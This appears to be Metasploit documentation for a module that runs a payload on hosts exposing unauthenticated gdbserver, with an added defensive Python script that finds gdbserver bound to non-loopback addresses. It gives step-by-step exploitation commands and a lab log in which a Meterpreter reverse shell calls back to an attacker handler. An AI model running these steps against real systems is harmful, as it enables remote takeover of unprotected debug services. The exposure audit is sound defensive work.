Vulnerable Application
This module attempts to execute an arbitrary payload through a gdbserver service that is exposed to untrusted network clients (gdbserver performs no authentication of its own).
Installation Steps
Install gdbserver:
apt-get install gdbserver
Verification Steps
Start gdbserver on a TCP port:
gdbserver 0.0.0.0:1234 /bin/true
- Start msfconsole
- Do: use exploit/multi/gdb/gdb_server_exec
- Do: set RHOSTS <ip>
- Do: set RPORT <port>
- Do: run
- You should get a session.
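The setup above works because gdbserver bound to 0.0.0.0 accepts any TCP client, so a host audit can look for gdbserver listeners on non-loopback addresses. The following Python code is an added example, not part of the module or its documentation; it parses `ss -H -ltnp` output, and the sample lines, function names and `--live` switch are constructed for illustration.

```python
import ipaddress
import re
import subprocess
import sys

# Constructed sample of `ss -H -ltnp` output (not captured from a real host).
SAMPLE_SS = """\
LISTEN 0 1      0.0.0.0:1234    0.0.0.0:* users:(("gdbserver",pid=4321,fd=3))
LISTEN 0 128  127.0.0.1:631     0.0.0.0:* users:(("cupsd",pid=812,fd=7))
LISTEN 0 1    127.0.0.1:9999    0.0.0.0:* users:(("gdbserver",pid=600,fd=3))
LISTEN 0 1         [::]:2345       [::]:* users:(("gdbserver",pid=555,fd=3))
LISTEN 0 4096 127.0.0.53%lo:53  0.0.0.0:* users:(("systemd-resolve",pid=700,fd=14))
"""

PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),')


def is_loopback(host):
    """True only for addresses that cannot be reached from another machine."""
    host = host.strip("[]").split("%")[0]  # drop IPv6 brackets and %iface scope
    if host == "*":                        # wildcard: every interface
        return False
    try:
        return ipaddress.ip_address(host).is_loopback
    except ValueError:
        return False                       # unparseable: report rather than hide


def exposed_gdbserver_listeners(ss_output):
    """Return (address, port, pid) for each gdbserver listener not on loopback."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        # Without the process column (ss run unprivileged) ownership is unknown.
        if len(fields) < 6 or fields[0] != "LISTEN":
            continue
        host, _, port = fields[3].rpartition(":")
        for name, pid in PROC_RE.findall(" ".join(fields[5:])):
            if name == "gdbserver" and not is_loopback(host):
                findings.append((host, int(port), int(pid)))
    return findings


if __name__ == "__main__":
    text = SAMPLE_SS
    if "--live" in sys.argv:  # root is needed to see other users' processes
        text = subprocess.run(["ss", "-H", "-ltnp"],
                              capture_output=True, text=True, check=True).stdout
    for host, port, pid in exposed_gdbserver_listeners(text):
        print(f"gdbserver pid {pid} is listening on {host}:{port}")
```

A finding means the debug stub should be stopped, bound to loopback, or reached only over an authenticated tunnel such as SSH port forwarding.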
Options
Scenarios
gdbserver 10.2 on Ubuntu 20.04 (x86_64)
msf6 > use exploit/multi/gdb/gdb_server_exec
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > set rhosts 192.168.200.135
rhosts => 192.168.200.135
msf6 exploit(multi/gdb/gdb_server_exec) > set rport 1234
rport => 1234
msf6 exploit(multi/gdb/gdb_server_exec) > set target x86_64
target => x86_64
msf6 exploit(multi/gdb/gdb_server_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/gdb/gdb_server_exec) > run
[*] Started reverse TCP handler on 192.168.200.130:4444
[*] 192.168.200.135:1234 - Performing handshake with gdbserver...
[*] 192.168.200.135:1234 - Stepping program to find PC...
[*] 192.168.200.135:1234 - Writing payload at 00007ffff7fd0103...
[*] 192.168.200.135:1234 - Executing the payload...
[*] Sending stage (3020772 bytes) to 192.168.200.135
[*] Meterpreter session 1 opened (192.168.200.130:4444 -> 192.168.200.135:33198 ) at 2022-04-16 16:21:14 -0400
meterpreter > getuid
Server username: user
meterpreter > sysinfo
Computer : 192.168.200.135
OS : Ubuntu 20.04 (Linux 5.13.0-35-generic)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter >